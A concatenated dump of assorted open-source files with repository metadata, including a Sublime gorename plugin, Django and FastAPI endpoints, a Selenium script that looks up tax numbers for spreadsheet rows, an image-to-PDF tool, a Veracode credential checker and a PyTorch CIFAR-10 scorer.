liuhewei/gotools-sublime
|
2c44f84024f9fd27ca5c347cab080b80397a32c2
|
[
"MIT"
] | 18
|
2016-04-19T18:23:49.000Z
|
2021-08-31T14:32:03.000Z
|
import sublime
import sublime_plugin
import os
from .gotools_util import Buffers
from .gotools_util import GoBuffers
from .gotools_util import Logger
from .gotools_util import ToolRunner
class GotoolsRenameCommand(sublime_plugin.TextCommand):
def is_enabled(self):
return GoBuffers.is_go_source(self.view)
def run(self, edit):
initial_text = self.view.substr(self.view.word(self.view.sel()[0].begin()))
self.view.window().show_input_panel("Go rename:", initial_text, self.do_rename, None, None)
def do_rename(self, name):
filename, _row, _col, offset, _offset_end = Buffers.location_at_cursor(self.view)
args = [
"-offset", "{file}:#{offset}".format(file=filename, offset=offset),
"-to", name,
"-v"
]
output, err, exit = ToolRunner.run(self.view, "gorename", args, timeout=15)
if exit != 0:
print("GoTools: Gorename error:\n%s" % err)
Logger.status("rename failed ({0}): {1}".format(exit, err))
return
Logger.status("renamed symbol to {name}".format(name=name))
panel = self.view.window().create_output_panel('gotools_rename')
panel.set_scratch(True)
# TODO: gorename isn't emitting line numbers, so to get clickable
# referenced we'd need to process each line to append ':N' to make the
# sublime regex work properly (line number is a required capture group).
panel.settings().set("result_file_regex", "^\t(.*\.go)$")
panel.run_command("select_all")
panel.run_command("right_delete")
panel.run_command('append', {'characters': err})
self.view.window().run_command("show_panel", {"panel": "output.gotools_rename"})
| 38.116279
| 95
| 0.698597
| 1,449
| 0.884076
| 0
| 0
| 0
| 0
| 0
| 0
| 484
| 0.295302
|
bb5ffa2d4cc2b708f22acabc46b7a17e37cfa7ad
| 765
|
py
|
Python
|
backend/equipment/endpoints.py
|
Vini1979/Engenharia_Software_IF977
|
dee99b7a05736bd35935d30a88b61a1f273d7633
|
[
"MIT"
] | null | null | null |
backend/equipment/endpoints.py
|
Vini1979/Engenharia_Software_IF977
|
dee99b7a05736bd35935d30a88b61a1f273d7633
|
[
"MIT"
] | 1
|
2021-04-14T18:52:27.000Z
|
2021-04-14T18:52:27.000Z
|
backend/equipment/endpoints.py
|
Vini1979/Engenharia_Software_IF977
|
dee99b7a05736bd35935d30a88b61a1f273d7633
|
[
"MIT"
] | 1
|
2021-04-27T18:15:13.000Z
|
2021-04-27T18:15:13.000Z
|
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView
from equipment.serializers import EquipmentSerializer, ItemSerializer
from equipment.models import Item, Equipment
class ListCreateItemEndpoint(ListCreateAPIView):
serializer_class = ItemSerializer
queryset = Item.objects.all()
class RetrieveUpdateDestroyItemEndpoint(RetrieveUpdateDestroyAPIView):
serializer_class = ItemSerializer
queryset = Item.objects.all()
class ListCreateEquipmentEndpoint(ListCreateAPIView):
serializer_class = EquipmentSerializer
queryset = Equipment.objects.all()
class RetrieveUpdateDestroyEquipmentEndpoint(RetrieveUpdateDestroyAPIView):
serializer_class = EquipmentSerializer
queryset = Equipment.objects.all()
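# Routing sketch (an added illustration of how a urls.py might expose these
# views; the URL paths below are assumptions, not taken from the project):
from django.urls import path

urlpatterns = [
    path('items/', ListCreateItemEndpoint.as_view()),
    path('items/<int:pk>/', RetrieveUpdateDestroyItemEndpoint.as_view()),
    path('equipment/', ListCreateEquipmentEndpoint.as_view()),
    path('equipment/<int:pk>/', RetrieveUpdateDestroyEquipmentEndpoint.as_view()),
]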
| 31.875
| 83
| 0.831373
| 554
| 0.724183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
bb601bdac4b627b652ca2cc549c648ed9d7b4ddf
| 1,286
|
py
|
Python
|
{{cookiecutter.project_slug}}/setup.py
|
mathemaphysics/cookiecutter-cpp-devcontainer
|
d9a8e23e165e3698b4a1cb4516a397450355466a
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_slug}}/setup.py
|
mathemaphysics/cookiecutter-cpp-devcontainer
|
d9a8e23e165e3698b4a1cb4516a397450355466a
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_slug}}/setup.py
|
mathemaphysics/cookiecutter-cpp-devcontainer
|
d9a8e23e165e3698b4a1cb4516a397450355466a
|
[
"MIT"
] | null | null | null |
{%- set modname = cookiecutter.project_slug.replace('-', '') -%}
from skbuild import setup
{%- if cookiecutter.use_submodules == "No" %}
import os
import pybind11
{%- endif %}
setup(
name='{{ modname }}',
version='0.0.1',
author='{{ cookiecutter.full_name }}',
author_email='your@email.com',
description='Add description here',
long_description='',
classifiers=[
"Programming Language :: Python :: 3",
"Operating System :: OS Independent",
{%- if cookiecutter.license == "MIT" %}
"License :: OSI Approved :: MIT License",
{%- elif cookiecutter.license == "BSD-2" %}
"License :: OSI Approved :: BSD License",
{%- elif cookiecutter.license == "GPL-3.0" %}
"License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
{%- elif cookiecutter.license == "LGPL-3.0" %}
"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)",
{%- endif %}
],
zip_safe=False,
packages=["{{ modname }}"],
cmake_args=[
"-DBUILD_TESTING=OFF",
"-DBUILD_DOCS=OFF",
{%- if cookiecutter.use_submodules == "No" %}
f"-DCMAKE_PREFIX_PATH={os.path.dirname(pybind11.__file__)}",
{%- endif %}
],
package_dir={"": "python"},
cmake_install_dir="python/{{ modname }}",
)
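# For illustration, what cookiecutter would render from the template above,
# assuming project_slug="my-project" (so modname becomes "myproject"),
# use_submodules="No", license="MIT", and full_name "Jane Doe" — all of
# these values are assumptions, not part of the template:
# from skbuild import setup
# import os
# import pybind11
# setup(
#     name='myproject',
#     version='0.0.1',
#     author='Jane Doe',
#     ...
#     packages=["myproject"],
#     cmake_args=[
#         "-DBUILD_TESTING=OFF",
#         "-DBUILD_DOCS=OFF",
#         f"-DCMAKE_PREFIX_PATH={os.path.dirname(pybind11.__file__)}",
#     ],
#     package_dir={"": "python"},
#     cmake_install_dir="python/myproject",
# )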
| 31.365854
| 83
| 0.604977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 574
| 0.446345
|
bb612a43c5e00fdec79d5ed2d464c2583287acfd
| 603
|
py
|
Python
|
lang/modules/os.py
|
pranavbaburaj/sh
|
dc0da9e10e7935310ae40d350c1897fcd65bce8f
|
[
"MIT"
] | 4
|
2021-01-30T12:25:21.000Z
|
2022-03-13T07:23:19.000Z
|
lang/modules/os.py
|
pranavbaburaj/sh
|
dc0da9e10e7935310ae40d350c1897fcd65bce8f
|
[
"MIT"
] | 3
|
2021-02-26T13:11:17.000Z
|
2021-06-04T17:26:05.000Z
|
lang/modules/os.py
|
pranavbaburaj/sh
|
dc0da9e10e7935310ae40d350c1897fcd65bce8f
|
[
"MIT"
] | 1
|
2021-02-08T10:18:29.000Z
|
2021-02-08T10:18:29.000Z
|
import os, platform
from clint.textui import colored as color
class OperatingSystem():
@staticmethod
def os_name():
return platform.system()
@staticmethod
def user_name():
return platform.uname().node
@staticmethod
def path():
return os.getcwd()
def list_directories(directory):
dir_list = os.listdir(directory)
for index, p in enumerate(dir_list):
path = os.path.join(directory, p)
if os.path.isfile(path):
print(color.green(str(p)))
else:
print(color.blue(str(p)))
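# Hedged usage sketch (requires `clint`; assumes list_directories is a
# module-level helper — its indentation relative to the class is ambiguous
# in this dump):
# print(OperatingSystem.os_name())          # e.g. 'Linux' or 'Windows'
# print(OperatingSystem.user_name())        # network name of this machine
# print(OperatingSystem.path())             # current working directory
# list_directories(OperatingSystem.path())  # files in green, dirs in blue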
| 22.333333
| 42
| 0.593698
| 244
| 0.404643
| 0
| 0
| 198
| 0.328358
| 0
| 0
| 0
| 0
|
bb63df222835f6eb78ba3c732e704619ca12b613
| 899
|
py
|
Python
|
data/transcoder_evaluation_gfg/python/CHECK_STRING_FOLLOWS_ANBN_PATTERN_NOT.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 241
|
2021-07-20T08:35:20.000Z
|
2022-03-31T02:39:08.000Z
|
data/transcoder_evaluation_gfg/python/CHECK_STRING_FOLLOWS_ANBN_PATTERN_NOT.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 49
|
2021-07-22T23:18:42.000Z
|
2022-03-24T09:15:26.000Z
|
data/transcoder_evaluation_gfg/python/CHECK_STRING_FOLLOWS_ANBN_PATTERN_NOT.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 71
|
2021-07-21T05:17:52.000Z
|
2022-03-29T23:49:28.000Z
|
# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
def f_gold ( str ) :
n = len ( str )
for i in range ( n ) :
if ( str [ i ] != 'a' ) :
break
if ( i * 2 != n ) :
return False
for j in range ( i , n ) :
if ( str [ j ] != 'b' ) :
return False
return True
#TOFILL
if __name__ == '__main__':
param = [
('ba',),
('aabb',),
('abab',),
('aaabb',),
('aabbb',),
('abaabbaa',),
('abaababb',),
('bbaa',),
('11001000',),
('ZWXv te',)
]
n_success = 0
for i, parameters_set in enumerate(param):
if f_filled(*parameters_set) == f_gold(*parameters_set):
n_success+=1
print("#Results: %i, %i" % (n_success, len(param)))
| 23.051282
| 64
| 0.506118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 302
| 0.335929
|
bb64614546d6d512164770fa3b04fc627d4d3bf2
| 218
|
py
|
Python
|
api/urls.py
|
kaito1002/django-rest-init
|
8ece6311ea84c46e74a0ac0b7f42983f40a72c34
|
[
"MIT"
] | null | null | null |
api/urls.py
|
kaito1002/django-rest-init
|
8ece6311ea84c46e74a0ac0b7f42983f40a72c34
|
[
"MIT"
] | null | null | null |
api/urls.py
|
kaito1002/django-rest-init
|
8ece6311ea84c46e74a0ac0b7f42983f40a72c34
|
[
"MIT"
] | null | null | null |
from rest_framework import routers
from user.views import UserViewSet
from .views import SampleViewSet
router = routers.DefaultRouter()
router.register('users', UserViewSet)
router.register('samples', SampleViewSet)
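# Hypothetical completion (the project's actual URL configuration may
# differ): the registered routes are exposed through Django's urlpatterns.
# from django.urls import include, path
# urlpatterns = [
#     path('', include(router.urls)),
# ]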
| 24.222222
| 41
| 0.821101
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 16
| 0.073394
|
bb66ace576783c81b7f71f58e215ed9554b532e3
| 1,249
|
py
|
Python
|
iipython/embeds.py
|
plasma-chat/plugins
|
58dc5e6520e62fb473eb4fda4292b9adb424b75d
|
[
"MIT"
] | null | null | null |
iipython/embeds.py
|
plasma-chat/plugins
|
58dc5e6520e62fb473eb4fda4292b9adb424b75d
|
[
"MIT"
] | null | null | null |
iipython/embeds.py
|
plasma-chat/plugins
|
58dc5e6520e62fb473eb4fda4292b9adb424b75d
|
[
"MIT"
] | null | null | null |
# Copyright 2022 iiPython
# Modules
import time
# Initialization
embed_size = 45
# Plugin class
class EmbedPlugins(object):
def __init__(self, eventmgr) -> None:
self.meta = {
"name": "Embeds",
"author": "iiPython",
"id": "embeds"
}
self.eventmgr = eventmgr
def center(self, line: str) -> str:
padding = round((embed_size - len(line)) / 2)
return (" " * padding) + line + (" " * padding)
    def normalize(self, lines: list, tags: str) -> list:  # annotations fixed: takes and returns a list of lines
new, longest = [], len(max(lines, key = len))
for line in lines:
new.append(f"{tags}" + line + (" " * (longest - len(line))))
return new
def on_call(self, args: list) -> str:
try:
title, body = args[0], args[1]
except IndexError:
            return self.print("usage: /embeds <title> <body>")  # note: print() is not defined on this class; presumably injected by the plugin host
# Make footer
footer = time.strftime("%I:%M %p · %Z")
# Construct embed
embed_lines = [self.center(line) for line in [title] + [body[i:i + (embed_size - 10)] for i in range(0, len(body), embed_size - 10)] + ["", footer]]
return "\n".join(self.normalize(embed_lines, args[2] if len(args) > 2 else "[bglblack]"))
| 29.046512
| 156
| 0.542834
| 1,150
| 0.92
| 0
| 0
| 0
| 0
| 0
| 0
| 221
| 0.1768
|
bb66fc7050d575d46b09f705e4a0c71d8c66cda1
| 11,303
|
py
|
Python
|
inn.py
|
NLipatov/INNer
|
88816c91bfb85f287b734aff69a5b60ad43f129e
|
[
"MIT"
] | null | null | null |
inn.py
|
NLipatov/INNer
|
88816c91bfb85f287b734aff69a5b60ad43f129e
|
[
"MIT"
] | null | null | null |
inn.py
|
NLipatov/INNer
|
88816c91bfb85f287b734aff69a5b60ad43f129e
|
[
"MIT"
] | null | null | null |
import time, os, xlrd, xlwt, re, webbrowser, time_convert, Process_killer, tkinter as tk
from tkinter import messagebox as mb
from xlwt import easyxf
from threading import Thread
from selenium import webdriver
from selenium.common.exceptions import SessionNotCreatedException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from subprocess import CREATE_NO_WINDOW
from xlutils.copy import copy
direction = None
workbookname = None
status = ''
def DirWor(Dir, Wor):
global direction
global workbookname
direction = Dir
workbookname = Wor
innermessage = 'Working on file'
message = ''
refreshedINN = 0
def Add_to_Message(arg):
global message
message += str( arg )
def Get_message():
return innermessage + message
def TT():
os.chdir( direction )
def Draw():
global text, status
    status = 'File in progress'
    frame = tk.Frame( root, relief='solid', bd=1, bg='grey' )
    root.geometry( '700x90+500+600' )
    root.iconbitmap( r"C:\INNer\INNERICC.ico" )  # duplicate call removed
    root.title( 'File in progress' )
    try:
        window.iconbitmap( r"C:\INNer\INNERICC.ico" )  # 'window' is undefined; the bare except swallows the NameError
    except:
        pass
frame.pack()
text = tk.Label( frame, text='HELLO' )
text.pack( side='top' )
def Refresher():
global text
text.configure( text=Get_message() )
root.after( 1000, Refresher )
        if status == 'Done':
root.title( status )
root.lift()
root.attributes( '-topmost', True )
root.after_idle( root.attributes, '-topmost', False )
else:
root.title( status )
root = tk.Tk()
Draw()
Refresher()
root.mainloop()
def Main():
global innermessage, message, status
DriverPath = r'C:\INNer\chromedriver.exe'
os.chdir( direction )
TotalWorkingTimeStart = time.time()
Chk1 = 0
DriverPathExist = os.path.isfile( DriverPath )
if DriverPathExist == True:
pass
else:
while True:
            status = 'Error'
            innermessage = 'Error'
            message = ('chromedriver.exe was not found in the INNer folder')
pass
workbook = xlrd.open_workbook( workbookname )
sheet = workbook.sheet_by_index( 0 )
workbookWT = xlrd.open_workbook( (workbookname), formatting_info=True )
sheetWT = workbookWT.sheet_by_index( 0 )
wb = copy( workbookWT )
wbsheet = wb.get_sheet( 0 )
options = Options()
options.add_argument( '--headless' )
options.add_argument( '--disable-gpu' )
options.add_experimental_option( 'excludeSwitches', ['enable-logging'] )
try:
driver = webdriver.Chrome( f'{DriverPath}', options=options )
except SessionNotCreatedException as session_not_created_ex:
error_text = str( session_not_created_ex )[29:]
        status = 'Error'
        innermessage = 'Description of the error:'
        message = (f'\n{error_text}')
        if mb.askyesno( title='chromedriver.exe update required',
                        message='Open the chromedriver download page?' ):
            Process_killer.process_kill( 'chromedriver.exe' )
            webbrowser.open( 'https://chromedriver.chromium.org/downloads' )
            mb.showinfo( title='Hint',
                         message='After downloading the new version of chromedriver.exe, '
                                 'copy it to C:\\INNer, replacing the existing files' )
while True:
pass
TotalClientsNumber = sheet.nrows - 1
TotalClientsNumberNowWorking = 0
RFW = 1
    infoApproxTime = (f'Expected running time: {(3.7 * sheet.nrows - TotalClientsNumber) / 60} minute(s)\n\n\n')
message = str( infoApproxTime )
try:
for i in range( 1, sheet.nrows ):
            message = str( f'\n\nClients processed: {TotalClientsNumberNowWorking}/{TotalClientsNumber}\n' )
ST = time.time()
RFW = i
translit_name = sheet.cell_value( i, 5 )
re_res = re.findall( r'^\w+', f'{translit_name}' )
if re_res[0].lower() in ['mister', 'mistress', 'mizz', 'miss', 'mr', 'mrs', 'miss', 'ms', 'dr']:
corrected_translit_name = translit_name.replace( f'{re_res[0]} ', '' )
wbsheet.write( i, 5, corrected_translit_name, easyxf( 'font: name Calibri, height 220;' ) )
wb.save( 'INNERED — ' + workbookname )
nam = sheet.cell_value( i, 2 )
if nam == '':
                message += str( '\n\n\nBreak. File ends here — blank cell at client\'s name\n\n\n' )
break
otch = sheet.cell_value( i, 3 )
lotch = str( sheet.cell_value( i, 3 ) ).lower()
fam = sheet.cell_value( i, 4 )
pnum = sheet.cell_value( i, 7 ) + sheet.cell_value( i, 8 )
bdate = sheet.cell_value( i, 19 ).replace( '-', '' )
if lotch == '' or lotch == 'отсутствует' or lotch == 'нет' or lotch == '-':
middle_name = False
else:
middle_name = True
            if middle_name:
                infoNowWorkingOnClient = str( f'Now working on: {fam} {nam[0]}. {otch[0]}.' )
                print(middle_name)
            elif not middle_name:
                infoNowWorkingOnClient = str( f'Now working on: {fam} {nam[0]}.' )
                print( middle_name )
message = message + str( infoNowWorkingOnClient )
refreshedINN = 0
if RFW != i:
Chk1 += 1
while True:
                    status = 'Error'
                    innermessage = 'Error'
                    message = ('Critical error: RFW != i!')
pass
if fam == sheet.cell_value( i, 4 ):
pass
else:
while True:
                    status = 'Error'
                    innermessage = 'Error'
                    message = ('\nShutting down - Critical error - the last name from the site and from the file did not match')
pass
if Chk1 < 1:
for i in range( 0, 10 ):
try:
driver.get( 'https://service.nalog.ru/static/personal-data.html?svc=inn&from=%2Finn.do' )
driver.find_element_by_id( "unichk_0" ).click()
driver.find_element_by_id( "btnContinue" ).click()
time.sleep( 0.5 )
for i in range( 0, (len( fam )) ):
driver.find_element_by_name( "fam" ).send_keys( fam[i] )
for i in range( 0, (len( nam )) ):
driver.find_element_by_name( "nam" ).send_keys( nam[i] )
if lotch == '' or lotch == 'отсутствует' or lotch == 'нет' or lotch == '-':
driver.find_element_by_xpath( '//*[@id="unichk_0"]' ).click()
else:
for i in range( 0, (len( otch )) ):
driver.find_element_by_name( "otch" ).send_keys( otch[i] )
for i in range( 0, (len( bdate )) ):
driver.find_element_by_name( "bdate" ).send_keys( bdate[i] )
for i in range( 0, (len( pnum )) ):
driver.find_element_by_name( "docno" ).send_keys( pnum[i] )
driver.find_element_by_id( "btn_send" ).click()
break
except:
                        status = 'Error'
                        innermessage = 'An error occurred after the request was sent, before the request result was received.'
for i in range( 0, 10 ):
try:
result = driver.find_element_by_xpath( '//*[@id="result_1"]/div' ).text
if result == '':
time.sleep( 0.5 )
if i == 9:
res_msg = driver.find_element_by_xpath(
'/html/body/div[1]/div[3]/div/form/div[1]/div[1]/div/div[2]/p[1]' ).text
                                status = 'Error'
innermessage = f'{res_msg}'
TotalClientsNumberNowWorking += 1
wbsheet.write( RFW, 17, '-' )
break
else:
wbsheet.write( RFW, 17, (result[32:69]) )
ET = time.time()
                            print( f'\nINN:{result[32:69]}' )
wb.save( 'INNERED — ' + workbookname )
                            status = 'File in progress'
                            innermessage = f'Recorded — client {fam} INN: {result[32:69]}' + \
                                '\nResult received and recorded in %.1f seconds' % ((ET - ST))
TotalClientsNumberNowWorking += 1
break
except:
if i == 9:
                            status = 'File in progress'
                            innermessage = 'Could not find the element containing the INN'
                            message = (f'i - {i}, fam - {fam}')
wbsheet.write( RFW, 17, '-' )
wb.save( 'INNERED — ' + workbookname )
TotalClientsNumberNowWorking += 1
else:
                status = 'Critical error'
                innermessage = 'Program execution stopped'
                message = ('The Chk1 check was not passed.')
except PermissionError:
        status = 'Critical error'
        innermessage = 'Program execution stopped'
        message = ('Critical error — the file must be closed!')
driver.quit()
if Chk1 == 0:
        status = 'Done'
        innermessage = '\nWork completed'
        message = ('\nFile processed')
    else:
        status = 'The results of this run must not be used!'
        innermessage = 'Warning:'
        message = ('Work completed with errors!')
while True:
pass
TotalWorkingTimeEnd = time.time()
    innermessage = 'Done'
    EndingA = ('\nThe program finished in %.1f minute(s)' % (((TotalWorkingTimeEnd - TotalWorkingTimeStart) / 60)))
    EndingB = ('\nPace: %.1f second(s) per client' % (
        ((TotalWorkingTimeEnd - TotalWorkingTimeStart) / sheet.nrows)))
    message = str( EndingA )
    message += str( EndingB )
    workbook.release_resources()
    status = 'Work completed'
def Start():
MAin_thread = Thread( target=Main )
MAin_thread.start()
TT_thread = Thread( target=TT )
TT_thread.start()
# Destroyer_thread = Thread(target=Destroyer())
# Destroyer_thread.start()
# MAin_thread.join()
# TT_thread.join()
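# The module exposes DirWor() to set the working directory and workbook, and
# Start() to spawn the worker threads. A hypothetical caller (the actual GUI
# front-end is not part of this file; paths and filenames are examples):
# import inn
# inn.DirWor(r'C:\INNer\jobs', 'clients.xls')
# inn.Start()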
| 41.862963
| 116
| 0.508891
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,391
| 0.27736
|
bb67b96194c55ddd1e174b93f999f14cfde628ec
| 803
|
py
|
Python
|
backend/src/api/routes.py
|
gideonmandu/image-difference
|
50007e5a899f5f10f519ac76312cd60f76c2ddd2
|
[
"MIT"
] | null | null | null |
backend/src/api/routes.py
|
gideonmandu/image-difference
|
50007e5a899f5f10f519ac76312cd60f76c2ddd2
|
[
"MIT"
] | null | null | null |
backend/src/api/routes.py
|
gideonmandu/image-difference
|
50007e5a899f5f10f519ac76312cd60f76c2ddd2
|
[
"MIT"
] | null | null | null |
import uuid
from typing import Optional
from fastapi import UploadFile, APIRouter
from src.services.image_processing import ImageProcessor
router = APIRouter(prefix="/file", tags=["passport & ID upload"])
# @router.get("",)
# async def index():
# return {"test": "hello world"}
@router.post("/upload/")
async def create_upload_file(file: Optional[UploadFile] = None):
if not file:
return {"message": "No upload file sent"}
file.filename = f"src/files/{file.filename}.{file.filename.split('.')[1]}"
image_bytes = await file.read()
with open(f"{file.filename}", "wb") as f:
f.write(image_bytes)
image_processor = ImageProcessor(image=f"{file.filename}")
return {
"filename": file.filename,
"imagetype": image_processor.image_type(),
}
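# Hedged test sketch using FastAPI's TestClient. The app factory below is an
# assumption — the project's real application module isn't shown here:
# from fastapi import FastAPI
# from fastapi.testclient import TestClient
# from src.api.routes import router
# app = FastAPI()
# app.include_router(router)
# client = TestClient(app)
# with open("passport.png", "rb") as image:
#     response = client.post("/file/upload/", files={"file": image})
# print(response.json())  # {"filename": ..., "imagetype": ...}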
| 28.678571
| 78
| 0.671233
| 0
| 0
| 0
| 0
| 515
| 0.641345
| 490
| 0.610212
| 262
| 0.326276
|
bb67eb4b7ecd3f699aaf7a537dafe8901082a0fc
| 1,474
|
py
|
Python
|
pdf_gen.py
|
MasatoHanayama/pdf_gen
|
b16491a31cea0d1a4931e979d600870d6be07c3e
|
[
"MIT"
] | 1
|
2022-03-15T12:57:46.000Z
|
2022-03-15T12:57:46.000Z
|
pdf_gen.py
|
MasatoHanayama/pdf_gen
|
b16491a31cea0d1a4931e979d600870d6be07c3e
|
[
"MIT"
] | null | null | null |
pdf_gen.py
|
MasatoHanayama/pdf_gen
|
b16491a31cea0d1a4931e979d600870d6be07c3e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import argparse
import img2pdf
import tqdm
from natsort import natsorted
from PIL import Image
def pdf_gen(src, dst):
pages = []
for file in natsorted(os.listdir(src)):
        if os.path.splitext(file)[-1] in ('.jpg', '.jpeg', '.png'):
pages.append(os.path.join(src, file))
if len(pages) == 0:
print("Failed: {}".format(src))
return
with open(dst, 'wb') as pdf:
pdf.write(img2pdf.convert(pages))
def webp2png(src):
for file in natsorted(os.listdir(src)):
if os.path.splitext(file)[-1] == '.webp':
im = Image.open(os.path.join(src, file)).convert('RGB')
im.save(os.path.join(src, '{}.png'.format(os.path.splitext(file)[0])), 'png')
os.remove(os.path.join(src, file))
def main(src_path):
dirs = [f.path for f in os.scandir(src_path) if f.is_dir()]
# for dir in tqdm.tqdm(dirs):
for dir in dirs:
print(dir)
webp2png(dir)
pdf_gen(dir, '{}.pdf'.format(dir))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('src', help='src dir')
args = parser.parse_args()
main(args.src)
# dirs = [f.path for f in os.scandir(args.src) if f.is_dir()]
# # for dir in tqdm.tqdm(dirs):
# for dir in dirs:
# print(dir)
# webp2png(dir)
# pdf_gen(dir, '{}.pdf'.format(dir))
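# Minimal sanity check, sketched under assumptions (requires Pillow, img2pdf,
# natsort; run in the same module context, e.g. appended below main):
# import os
# from PIL import Image
# os.makedirs("demo/vol1", exist_ok=True)
# Image.new("RGB", (100, 100), "white").save("demo/vol1/001.png")
# main("demo")   # writes demo/vol1.pdf, one PDF per sub-directory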
| 28.346154
| 129
| 0.586839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 329
| 0.223202
|
bb67fb540424cdb298487932ac6c8b19b1c4e193
| 1,113
|
py
|
Python
|
userapiexpiry.py
|
tjarrettveracode/veracode-python-api_credentials_expiry-example
|
3188c53f81c4bf0b5f4d27f4aa1dc3de2f3f5aef
|
[
"MIT"
] | null | null | null |
userapiexpiry.py
|
tjarrettveracode/veracode-python-api_credentials_expiry-example
|
3188c53f81c4bf0b5f4d27f4aa1dc3de2f3f5aef
|
[
"MIT"
] | null | null | null |
userapiexpiry.py
|
tjarrettveracode/veracode-python-api_credentials_expiry-example
|
3188c53f81c4bf0b5f4d27f4aa1dc3de2f3f5aef
|
[
"MIT"
] | null | null | null |
import sys
import requests
import datetime
from dateutil.parser import parse
from veracode_api_py import VeracodeAPI as vapi
def creds_expire_days_warning():
creds = vapi().get_creds()
exp = datetime.datetime.strptime(creds['expiration_ts'], "%Y-%m-%dT%H:%M:%S.%f%z")
delta = exp - datetime.datetime.now().astimezone() #we get a datetime with timezone...
if (delta.days < 7):
print('These API credentials expire {}'.format(creds['expiration_ts']))
def main():
# CHECK FOR CREDENTIALS EXPIRATION
creds_expire_days_warning()
data = vapi().get_users()
for user in data:
data2 = vapi().get_user(user["user_id"])
if "api_credentials" in data2:
date_time_str = parse(data2["api_credentials"]["expiration_ts"])
date = date_time_str.date()
time = date_time_str.time()
print("User {} API Credentials expiration date is {} {}".format(user["user_name"],str(date),str(time)))
else:
print("User {} has no API credentials".format(user["user_name"]))
if __name__ == '__main__':
main()
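# Illustrative: how dateutil splits an ISO timestamp into the date and time
# parts printed above (the timestamp value is made up):
# from dateutil.parser import parse
# dt = parse("2024-06-01T12:30:45.000+0000")
# print(dt.date(), dt.time())  # 2024-06-01 12:30:45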
| 32.735294
| 115
| 0.645103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 328
| 0.294699
|
bb68392d7aa3e6ae41470c5c442a63fe00343194
| 3,258
|
py
|
Python
|
recipes/tensorflow/samples/pytorch/cifar10/samples/tensorflow/scorer.py
|
arturrutkiewicz-divae/aep-rfm-score
|
705fc54e505fdb8763073401be7b97c81474b0a9
|
[
"Apache-2.0"
] | 18
|
2018-12-13T18:53:31.000Z
|
2021-09-29T20:14:05.000Z
|
recipes/tensorflow/samples/pytorch/cifar10/samples/tensorflow/scorer.py
|
DalavanCloud/experience-platform-dsw-reference
|
2e0af85a47ec05b7cda77d61954c1cde0a625f5c
|
[
"Apache-2.0"
] | 27
|
2019-01-02T22:52:51.000Z
|
2021-05-26T15:14:17.000Z
|
recipes/tensorflow/samples/pytorch/cifar10/samples/tensorflow/scorer.py
|
DalavanCloud/experience-platform-dsw-reference
|
2e0af85a47ec05b7cda77d61954c1cde0a625f5c
|
[
"Apache-2.0"
] | 18
|
2019-01-09T19:34:57.000Z
|
2020-10-19T11:06:50.000Z
|
#
# Copyright 2017 Adobe.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from ml.runtime.tensorflow.Interfaces.AbstractScorer import AbstractScorer
import tensorflow as tf
import numpy
import torch
import torchvision
import torchvision.transforms as transforms
import torch.nn as nn
import torch.nn.functional as F
class Scorer(AbstractScorer):
def score(self, config={}):
"""loads trained weights and scores on test cofar-10 data
load trained model using the weights,
load the test dataset,
score and compute accuracy
:param config: passed on by ml-framework
:return: None
"""
print("Executed scorer 2")
print(config["modelPATH"])
print(config["logsPATH"])
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
testset = torchvision.datasets.CIFAR10(root='./data',
train=False,
download=True,
transform=transform)
testloader = torch.utils.data.DataLoader(testset,
batch_size=4,
shuffle=False,
num_workers=2)
net = Net()
state_dict = torch.load(config["modelPATH"] +
"/my_cifar_pytorch_model.dict")
net.load_state_dict(state_dict)
correct = 0
total = 0
with torch.no_grad():
for data in testloader:
images, labels = data
outputs = net(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the 10000 test images: %d %%' % (
100 * correct / total))
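# A common extension of the overall-accuracy loop above is per-class
# accuracy. A sketch that would reuse `net` and `testloader` if placed at the
# end of score(); the class-name order is the standard CIFAR-10 labeling:
#         classes = ('plane', 'car', 'bird', 'cat', 'deer',
#                    'dog', 'frog', 'horse', 'ship', 'truck')
#         class_correct = [0] * 10
#         class_total = [0] * 10
#         with torch.no_grad():
#             for images, labels in testloader:
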